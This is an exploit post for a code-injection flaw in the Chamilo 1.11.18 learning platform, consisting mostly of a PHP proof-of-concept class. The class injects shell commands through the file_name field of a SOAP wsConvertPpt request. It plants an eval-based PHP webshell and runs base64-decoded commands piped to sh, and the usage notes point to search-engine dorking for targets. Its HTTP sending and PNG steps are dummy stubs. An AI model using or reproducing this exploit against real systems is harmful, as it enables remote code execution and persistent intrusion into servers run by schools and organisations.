=============================================================================================================================================
| # Title     : Chamilo 1.11.18 Code Injection Vulnerability                                                                                |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            |
| # Vendor    : https://chamilo.org/en/2023/02/03/10-new-features-in-chamilo-1-11-18/                                                       |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] uses the CURL to Allow remote command .

[+] Line 123 set your target .

[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php 

[+] PayLoad :

<?php

class ChamiloExploit {
    private $targetUri;
    private $webshellName;
    private $postParam;

    public function __construct($targetUri, $webshell = null) {
        $this->targetUri = rtrim($targetUri, '/');
        $this->webshellName = $webshell ?: $this->generateRandomWebshellName();
    }

    private function generateRandomWebshellName() {
        return bin2hex(random_bytes(8)) . '.php';
    }

    private function soapRequest($cmd) {
        $pptSize = rand(720, 1440) . 'x' . rand(360, 720);
        return <<<EOS
<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope
    xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
    xmlns:ns1="{$this->targetUri}"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xmlns:xsd="http://www.w3.org/2001/XMLSchema"
    xmlns:ns2="http://xml.apache.org/xml-soap"
    xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
    SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
    <SOAP-ENV:Body>
        <ns1:wsConvertPpt>
            <param0 xsi:type="ns2:Map">
                <item>
                    <key xsi:type="xsd:string">file_data</key>
                    <value xsi:type="xsd:string"></value>
                </item>
                <item>
                    <key xsi:type="xsd:string">file_name</key>
                    <value xsi:type="xsd:string">`{{}}`.pptx'|" |{$cmd}||a #</value>
                </item>
                <item>
                    <key xsi:type="xsd:string">service_ppt2lp_size</key>
                    <value xsi:type="xsd:string">{$pptSize}</value>
                </item>
            </param0>
        </ns1:wsConvertPpt>
    </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
EOS;
    }

    public function uploadWebshell() {
        $this->postParam = bin2hex(random_bytes(4));

        $phpPayload = "<?php @eval(base64_decode(\$_POST['{$this->postParam}']));?>";
        $pngWebshell = $this->injectPhpPayloadPng($phpPayload);

        if ($pngWebshell === null) {
            return null;
        }

        $payload = base64_encode($pngWebshell);
        $cmd = "echo {$payload}|openssl enc -a -d > ./{$this->webshellName}";

        $response = $this->sendRequest('POST', "/main/webservices/additional_webservices.php", "text/xml; charset=utf-8", $this->soapRequest($cmd));
        return $response;
    }

    private function injectPhpPayloadPng($phpPayload) {
        // Implement your logic to inject PHP payload into a PNG image
        // For demonstration purposes, we'll return a dummy PNG data
        return pack('H*', '89504E470D0A1A0A...'); // Example PNG header
    }

    public function executePhp($cmd) {
        $payload = base64_encode($cmd);
        $response = $this->sendRequest('POST', "/main/inc/lib/ppt2png/{$this->webshellName}", "application/x-www-form-urlencoded", [$this->postParam => $payload]);
        return $response;
    }

    public function executeCommand($cmd) {
        $payload = base64_encode($cmd);
        $cmd = "echo {$payload}|openssl enc -a -d|sh";
        $response = $this->sendRequest('POST', "/main/webservices/additional_webservices.php", "text/xml; charset=utf-8", $this->soapRequest($cmd));
        return $response;
    }

    public function check() {
        $marker = bin2hex(random_bytes(4));
        $res = $this->executeCommand("echo {$marker}");
        if ($res && strpos($res, 'wsConvertPptResponse') !== false && strpos($res, $marker) !== false) {
            return 'Vulnerable';
        } else {
            return 'Safe';
        }
    }

    public function exploit($payload) {
        switch ($payload['type']) {
            case 'php':
                $res = $this->uploadWebshell();
                if (!$res || strpos($res, 'wsConvertPptResponse') === false) {
                    throw new Exception('Web shell upload error.');
                }
                $this->executePhp($payload['encoded']);
                break;
            case 'unix_cmd':
                $this->executeCommand($payload['encoded']);
                break;
            case 'linux_dropper':
                // Implement Linux dropper logic
                break;
        }
    }

    private function sendRequest($method, $uri, $ctype, $data) {
        // Implement your HTTP request logic here (using cURL or similar)
        // For demonstration purposes, return a dummy response
        return 'Dummy response';
    }
}

// Usage
$exploit = new ChamiloExploit('http://target.com', 'webshell.php');
$exploit->check();



Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================